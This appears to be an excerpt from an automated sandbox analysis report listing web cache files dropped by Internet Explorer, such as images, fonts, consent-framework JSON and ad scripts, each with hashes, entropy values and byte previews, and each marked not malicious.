MD5:	01499D3DDDE3D289D9E293CE10D4F565
SHA1:	352EB15BE34328E449A92136BF2AE67DD1FD5A5A
SHA-256:	5A79C1936C68184A1952E7384BCBB0A6ABAA88E905DB02D90BD3A7E47981653B
SHA-512:	57C7BC03557C8610600119B8994F7F81477C0F55A2BD81C10ED26527D2E1B6F25AC10E42CA26C5F8DA55DC94D6620309912A5C1800E2442C549C5F87EB538D4F
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(......(......(......(......(......(......(......(......(......(......(......(......(..........(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(..........(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......h.(......(......(......(.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\AAQYWm8[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	dropped
Size (bytes):	13217
Entropy (8bit):	7.95801980085305
Encrypted:	false
SSDEEP:	192:QoQulhJzy/nBnhg+WPACfLC2MqMRVg2wI5j3FrStIeP4P06ImiE48y+IIo31PN3G:bjkk+Wo8mrq6gNI3xg4PDNiJAY1l3Dub
MD5:	18BAB962F492552B63A7A3840027DF1F
SHA1:	F7922984A15284BED0F76CAD29C0E12B531CEF01
SHA-256:	7B55394387A29FDB898A36B89C61B17FC1DA7E9763920ED9A746A49F9156EC9D
SHA-512:	0C1E51FB106363BCD49BB2ACDACF48D8EC03677F4DED48740DBA4C05A8D8A98E75B99B49B7A5DED23BD1D2C70CE8A5DC6FE09C41B627DE4006BAF43B3DCF3A9D
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..u..@n!l).........D.N0kS.B......{5,.:.Q..3...~...L.F.....w.i....P...Q..[..\|.H...5.......%...!...GJ..u..K.K...(.....'..9.x4......a.,......;.5B%g+.....%w.d..T.........z.mG.][@.G.....f...j...'.>_ANI Wf\.7-..9!A....N..\.1.........3P....".-..\sR.{.Vg;[.J.\J..W...%....M~e.X..5....s...h..VAf.X..i9a...F..lAq.....E..e;..f..........Kqn.G.=Eh`\........l...;g....J.."....!.X

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\AAQYqMl[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	12085
Entropy (8bit):	7.868445665118221
Encrypted:	false
SSDEEP:	192:Q29PYGiyDX2g6kKZUB3wvR0/pjAyWugqQW4S+v8xq+cIJEfsT8zhS3:NeG5x6ZUBwmwExQIpT8zhS3
MD5:	BE7D49E27B34AC5B0E8A91C4A769B854
SHA1:	26FC2880083BF13416735A890FA4399DF870820F
SHA-256:	77F20DB93B5A56C97BCC0C07A35DC592DCBE3072B69DF9807176234E7AC5FE0B
SHA-512:	5A16D09F0CF6158214BCDA5AA34E7F32ED900DEC4DD8B284D06C6661A63A60540AB98E79C0B363E3149C0D1CB69B721EDA763103A3670FBCCFF7EB5951278C4C
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..+....(..411..1.UA...FYC."...4....i....x.........rZ.@........i...JB..(..,hZC..........qsN..E..f....)Xw..,.........2.3.........Rli......K...AJ.(..o.0r..k[+w...c.1.w8.R...2..6....~xgm..Q.....b.\|L@.............. .......'.O.$...\|.\..t.{C.UE...W...+~...i...kGQ........i.....XN(..BP...3L.....@.:P..1).P.L.%....).).(.i.R......L.;....(..5-..<1..w...m..z8U.<.z..H.R..........D.>TA.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\AAycUpK[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	279
Entropy (8bit):	6.585816958592039
Encrypted:	false
SSDEEP:	6:6v/lhPahm1TutaSP91hccpL3fHL5FlzNua5GVp:6v/7XSxFQcZ3f9rUa07
MD5:	D63AE2349294868B3EC2658627995955
SHA1:	E96A4ECB7E48AAC4355BDC28F12DA4C334AD2E20
SHA-256:	12D743416FD1041E0D34C45732DD577A39CD218B65E3F39BF43F2277EE7E6553
SHA-512:	4885F0BA41A6B9E0B14F588B6451C83B08ED2094247EE2160EAD9FB79D9A6474B7EF4DFFCA468845BD9DB27A66231833A9F94E62961975C55B12F3ACB9399C1A
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx.c....?......`...k.?3.]..W..w..g..b.z.(..^...d...BQ..8.....?..(..lo.....E.........\|.,. .\....gb.=..Ze0..A.....s...`M....ZW\|.`@1..J..x.(.:...\|....y...XH,..*....&-.a...8.B.8..A......S.Mn.....d30Y.Uw....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB10MkbM[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	936
Entropy (8bit):	7.711185429072882
Encrypted:	false
SSDEEP:	24:IJJuYNKuGlZLocJZlxAgAbiuoSrZzi1g3+:IJn94F/lxAZiuoSNYgO
MD5:	19B9391F3CA20AA5671834C668105A22
SHA1:	81C2522FC7C808683191D2469426DFC06100F574
SHA-256:	3557A603145306F90828FF3EA70902A1822E8B117F4BDF39933A2A413A79399F
SHA-512:	0E4BA430498B10CE0622FF745A4AE352FDA75E44C50C7D5EBBC270E68D56D8750CE89435AE3819ACA7C2DD709264E71CE7415B7EBAB24704B83380A5B99C66DC
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+.....ZIDATx.m._hSW....?....E...U.Z.M..a.1.}P..6+.....l......LDA......u.a.U..P..&k..Iz...&....R_.q.=p8....~.'...5..}......_.I$FS.\.c][4#.........+...U@fZz.Y.......\|.7....r.x..S.?.ws....B9.P.-Yt..N.}.'V......G...5....uc....XV.=.{..ai.pw.v)...(.9.z\\|.3:Q..,qr.es...ZTp..Mt.iB.2.{w.CWB..F...b../.H..\...).0l.R......c........@S5.?3...q..:..8.?....p.=6`..T...5.nn........]..b.j.,..pf.....8...".M..?.@K...L.='.1.O.2Kb.p..(..\.D.......n..._.....0.............w^bR....v\..)..l..f..l..M.m.6t.7....U.Y3?.h=..!.<.._........pL..V"[.......{[P....e07...Wc....IH.T@.....A@.......;....>Gt&...}...o...KP...7W1.sm~...&.......00.....>/....l.#.t......2.....L_Owu..A)...-.w..1/+.)....XR.A#;..X...p..3!...H.....f.ok;..\|x..1.R.\W.H\...<..<&.M!mk:\|....%.<..,.%.g..g..G@z^Q..I...T.D^..G.&v6$.J.2J....~..Y\kX.j.......c.&.>.3..........ek..+..~B.\......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB7hjL[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	462
Entropy (8bit):	7.383043820684393
Encrypted:	false
SSDEEP:	12:6v/7FMgL0KPV1ALxcVgmgMEBXu/+vVIIMhZkdjWu+7cW1T4:kMgoyocsOmIZIl+7cW1T4
MD5:	F810C713C84F79DBB3D6E12EDBCD1A32
SHA1:	09B30AB856BFFDB6AABE09072AEF1F6663BA4B86
SHA-256:	6E3B6C6646587CC2338801B3E3512F0C293DFF2F9540181A02C6A5C3FE1525A2
SHA-512:	236A88BD05EAF210F0B61F2684C08651529C47AA7DCBCD3575B067BEDCA1FBEE72E260441B4EAD45ABE32354167F98521601EA21DDF014FF09113EC4C0D9D798
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx...N.P...C.l...)...Mcb*qaC/..]..7..l...x.Z......w......._....<....\|.........."FX.3.v.A.............1..Rt...}......;....BT.....(X.....(....4...-...f....0.8...\|A.:P%.P..if.t..P..T.6..)s..H..~.C..(.7.s>....~...h..bz...Z.....D4Vm.T...2.5.U.P....q.6..1t~.ZU....7.i...".b.i.~...G.A!..&..+S.(<(...y._w..q........Q.l..1...Tz...Q...r.............g...+.o.]...J...$.8:.F..I.......XT..k.v....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\de-ch[2].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	79097
Entropy (8bit):	5.337866393801766
Encrypted:	false
SSDEEP:	768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
MD5:	408DDD452219F77E388108945DE7D0FE
SHA1:	C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
SHA-256:	197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
SHA-512:	17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
Malicious:	false
Reputation:	unknown
Preview:	{"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\f69ed47f-3ddb-476a-9d92-3f337b2721b0[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
Category:	dropped
Size (bytes):	87854
Entropy (8bit):	7.976517864058108
Encrypted:	false
SSDEEP:	1536:pcUrJi04ydZXZn9OMY959K31MXbLD8O98xeNci0NB0gyJJdYsLIIFRK:zI04yTZn9OMY/OMLLD8O9NBKyJJdXLtK
MD5:	CA8D530450265A63241FA78B7CEB056D
SHA1:	B629B7592B3AA9A1FA85A62761C3F46D1999A489
SHA-256:	B733A43821CA33E8E8194FA03F7BED4F052420407BFDEB3608ED3AB585296570
SHA-512:	9BC6493337B48B3FBF8F7CE6AD8F56EE7D6707685DEB8DE3EAC374F459208A78496E5D52710A12F9B4C234E1481F28CA4BB5A418B54BDC65D904FA08F8F4ED67
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.............C....................................................................C.......................................................................,.,.."...........................................@............................!..1."A.Q.#2a.$Bq.3.Rb....4...%&C...................................D........................!..1.A.."Q2aq.#B....R..3.....$b.....4Cr...............?.....bE(...........'.O..zj.....h.k..5..j.w.DM..;..?.<o.i..mt(.1.{...U.....v.D..l..Wu.oNiO.a..5^a...QS..M.......7.L...09.<...n....n..#.`6......q.....c..3I$..Z.J..jm..Uv......(..U....K&@q{u...rE.8...m......ll.......EM..Uz?..'....n..+.}...0.Q.Et.....Q6.U.wU...d.R.Q..2r6`0.c.3.....~}X..;.b.w#.<..y....GA....hS..0..=8.....?......&....7m...o..EEn........V"..fATkQUQ.F..M.D...W..S.N.O...Z.9.....wDw.M._.M.=EWT.....@..>..8....ubZl......}.<.?...O.."..TFl...eD_...T_...,UO(J.b#L..UE..Sm......m.......?.........u...\|..o...8..5.'.F..'m.Gx_.o.....N..+.W..q.?....u5.U.n.......L..4.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\favicon[2].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 2 icons, 16x16, 16 colors, 32x32, 16 colors
Category:	dropped
Size (bytes):	1078
Entropy (8bit):	1.240940859118772
Encrypted:	false
SSDEEP:	3:etFEh9HYflvlNl/AXll1pe/WNN00000000000000000000000000000000000001:QNtY6+lKY6
MD5:	4123CE1E1732F202F60292941FF1487D
SHA1:	9F12B11BDE582DAE37CE8C160537D919C561C464
SHA-256:	D961B08E4321250926DE6F79087594975FE20AD1518DE8F91EB711AF5D1A6EF8
SHA-512:	11B24C2E622C408E4774FAE120B719A21A0B2ACFA53230126C35AD6CA57D33D4DE79CBE11D296CFBDE9613CAA03D66B721BD20CF4EE030CF75F5A1FD8A286DA9
Malicious:	false
Reputation:	unknown
Preview:	..............(...&... ..........N...(....... ...............................................................................................................................................................................................................................................................................................(... ...@.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\iab2Data[2].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	271194
Entropy (8bit):	5.144309124586737
Encrypted:	false
SSDEEP:	1536:l3JqIHQCSq23YILFMPpWje+KULpfqjI9zT:hqCSVyIeiijq
MD5:	69E873EC1DB1AA38922F46E435785B61
SHA1:	0E17DD5D16C19D40847AEEEC9AF898BB7F228801
SHA-256:	D90C45999873C12E05B6A850C7C5473E1CB3DA9BD087DB5F038F56ABD65F108C
SHA-512:	27F403FDC906C317F4023735B29ABB090867CAA41103CE2FD19E487323EBEE15884DF10A353741C218BB83C748464BE3D75459F5D086FDE983DB85FC86ADA4D4
Malicious:	false
Reputation:	unknown
Preview:	{"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\medianet[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	411779
Entropy (8bit):	5.487189181959702
Encrypted:	false
SSDEEP:	6144:z75kYqP1vG2jnmuynGJ8nKM03VCuPbzXEcJuzYmD:w1vFjKnGJ8KMGxTcYmD
MD5:	088EA87A594EB8FC14A099745EF1AC40
SHA1:	2E0467E0326B2A58CBBC3BB81C7AFB893DDF9B25
SHA-256:	6758C8418CD6AB4D6D15530C487103D81E4EB66F37283A9681F2EFEABFF322A1
SHA-512:	81F8CB3996819562B3E822BE0A4D12C54160771C34239D90F3A45A0562C892055CFBF3CB5A5C686EC2CE3DA2539F54F85EEB700905099B995FDC17D8B6D402A3
Malicious:	false
Reputation:	unknown
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl\|\|"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON\|\|"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\medianet[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	411778
Entropy (8bit):	5.487176685804915
Encrypted:	false
SSDEEP:	6144:z75kYqP1vG2jnmuynGJ8nKM03VCuPbXXEcJuzYmD:w1vFjKnGJ8KMGxT4YmD
MD5:	2393F8A32C273A3A6CC8E283F63C1912
SHA1:	F2F5D7F8804CBD639F830E5C363CC672777BE02B
SHA-256:	0811DA8C672CDAC11A96B7C83A5EF673562DEDAA23F46D130D2D1098AC9A5F13
SHA-512:	D4E3F27C9FCBC8708DC207F3881FC65EB7E636645644AA0281E02089776A31E109C9F3BF1CA73535B1FCFEF9F3CC7FEC46D2140334349E6363FD110AC9A6DDA6
Malicious:	false
Reputation:	unknown
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl\|\|"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON\|\|"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\otTCF-ie[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	103536
Entropy (8bit):	5.315961772640951
Encrypted:	false
SSDEEP:	768:nq79kuJrnt6JjU7cVbkhS/G+FBlTjmSmjCRp0QRaPXJHJVhXKNTUCL29kJlXYoXY:49jht4bbkAOCRpl6TVgTUCLBX10UU/px
MD5:	6E60674C04FFF923CE6E30A0CD4B1A04
SHA1:	D77ED2B9FA6DD82C7A5F740777CC38858D9CBDDD
SHA-256:	48221F1DE0F509D6C365D9F4BA1D7DB8619E01C6BC4AC8462536836E582CDC66
SHA-512:	62F5068BDEDBA361DAD0B50B66F617A2A964B9D3DB748BF9DE29C4F6307B1891AF9A4D384F3CEB25C77B62D245F338D967084301391A41BAB9772E2632B36B96
Malicious:	false
Reputation:	unknown
Preview:	var otTCF=function(e){"use strict";var c="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function t(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function n(e,t){return e(t={exports:{}},t.exports),t.exports}function r(e){return e&&e.Math==Math&&e}function p(e){try{return!!e()}catch(e){return!0}}function E(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function o(e){return I.call(e).slice(8,-1)}function u(e){if(null==e)throw TypeError("Can't call method on "+e);return e}function l(e){return L(u(e))}function f(e){return"object"==typeof e?null!==e:"function"==typeof e}function i(e,t){if(!f(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!f(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}function y(

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\px[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	dropped
Size (bytes):	43
Entropy (8bit):	3.0950611313667666
Encrypted:	false
SSDEEP:	3:CUMllRPQEsJ9pse:Gl3QEsJLse
MD5:	AD4B0F606E0F8465BC4C4C170B37E1A3
SHA1:	50B30FD5F87C85FE5CBA2635CB83316CA71250D7
SHA-256:	CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
SHA-512:	EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
Malicious:	false
Reputation:	unknown
Preview:	GIF89a.............!.......,...........L..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\4996b9[1].woff Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Web Open Font Format, TrueType, length 45633, version 1.0
Category:	dropped
Size (bytes):	45633
Entropy (8bit):	6.523183274214988
Encrypted:	false
SSDEEP:	768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
MD5:	A92232F513DC07C229DDFA3DE4979FBA
SHA1:	EB6E465AE947709D5215269076F99766B53AE3D1
SHA-256:	F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
SHA-512:	32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
Malicious:	false
Reputation:	unknown
Preview:	wOFF.......A...........................,....OS/2...p...`...`B.Y.cmap.............G.glyf.......,...,0..Hhead.......6...6....hhea...,...$...$....hmtx............($LKloca...`...f...f....maxp...P... ... ....name............IU..post....... ... ............I.A_.<........... ........d........................^...q.d.Z.................................................................3.......3.....f..............................HL .@...U...f.........................................\.d.\.d...d.e.d.Z.d.b.d.4.d.=.d.Y.d.c.d.].d.b.d.I.d.b.d.f.d._.d.^.d.(.d.b.d.^.d.b.d.b.d...d...d._.d._.d...d...d.P.d.0.d.b.d.b.d.P.d.u.d.c.d.^.d._.d.q.d._.d.d.d.b.d._.d._.d.b.d.a.d.b.d.a.d.b.d...d...d.^.d.^.d.`.d.[.d...d...d.$.d.p.d...d...d.^.d._.d.T.d...d.b.d.b.d.b.d.i.d.d.d...d...d...d.7.d.^.d.X.d.].d.).d.l.d.l.d.b.d.b.d.,.d.,.d.b.d.b.d...d...d...d.7.d.b.d.1.d.b.d.b.d...d...d...d...d...d.A.d...d...d.(.d.`.d...d...d.^.d.r.d.f.d.,.d.b.d...d.b.d._.d.q.d...d...d.b.d.b.d.b.d.b.d...d.r.d.I.d._.d.b.d.b.d.b.d.V.d.Z.d.b.d

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAPQoxX[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	dropped
Size (bytes):	29573
Entropy (8bit):	7.923714752002336
Encrypted:	false
SSDEEP:	384:INas7fQoYk50HT2pCNRXne+4kfuASiPbTMJgn3ui/VveFKEZS1IdittMjFACj0A1:IzF10HapIdnear3kZSK4ttM8aaqeUHP
MD5:	64A63C14A787834D43C473733FBFFAD6
SHA1:	F364C8E81CFCA303F0A0F658BAF1276943669FCC
SHA-256:	C28A1E76B2CB256E0505676DDF289CDBBD0C9F2CE1553A021CF29D57626DFAD4
SHA-512:	204D9F37932441E64BF8E19AEE91EFFB8077C1CC4EF95A0F28B83254073EFFEF218DCCD4F032412257F3E9AE1764E41495CB96BFA620AF348E39AF54A3B47FED
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..e.[yv..W.t....%...i...TXlL..Ph-.F.Vm......v#...b..%....M.. .J...[.....q.iB.3.....i.D.........r....'&e.b....ztS..D....u.g(.Z...Y..5.).l.F...OZ...L.b..}..........)..#...9.t.)B...l.\'......J.......I..-,lA..NMjf.#....Y4.....7<..Wm'........R..f..tk,.AZ{K.......Ukjf.....J.a>e..a..t..!0G.i.`....s.h..HA@.v)...0....4^.!..[.}..yS].kX.>ddA..G".e..].Ww1J.l'..s.)."..~..]Y>...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAQVPm6[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
Category:	dropped
Size (bytes):	2403
Entropy (8bit):	7.807847874907652
Encrypted:	false
SSDEEP:	48:QfAuETAzOifN8pL/nF/TFZoTy7zOWk0ljjGzRi3wWLtWOqO+zgtO:Qf7EwN8tndAW7zI0l0SRnqO+zgtO
MD5:	10BDCE1F28F778B6F7C76D396A88A0A3
SHA1:	705B774818562E65F4C0DC64A08D8D1E38932772
SHA-256:	EB966433ADA42DEA9BE343ECAFA32C13851D1ADAF91734E0697D96AE3B876D0A
SHA-512:	1BD59BED9431C26C14AA4545A6B459680BBDD855E20CE1FE2A5BD4B861DAA793CA9FA6EAF96F353099440E80DD2046E54577DD0B329C45B8EA5FE13CB08B67D0
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....O.GO.a.._+......f.wF....LBP.LB........i\[.e......(?3...t(.jd..3..bj.... uR..z-.7t?.6W..5$[Y..\.P.}*Z.............~..3.f...y.+)9hkN......=Z0N#..o.uTWFQvg~k..m.&h.."....i..n..#..M\..-]....K..r..y<7SM..[U..\|{......TeqN...h.S# ..fz..o.O....l\|......T.:Z@@..4..[....).EgQ7-..?.c.T.`..k..=2.....7...\.Y.-Q).2{kV.-....cM!66....Q...Rj.(.d..{...Z.#...Oj.KPI....t.1G?.....j....7Z..Z%.
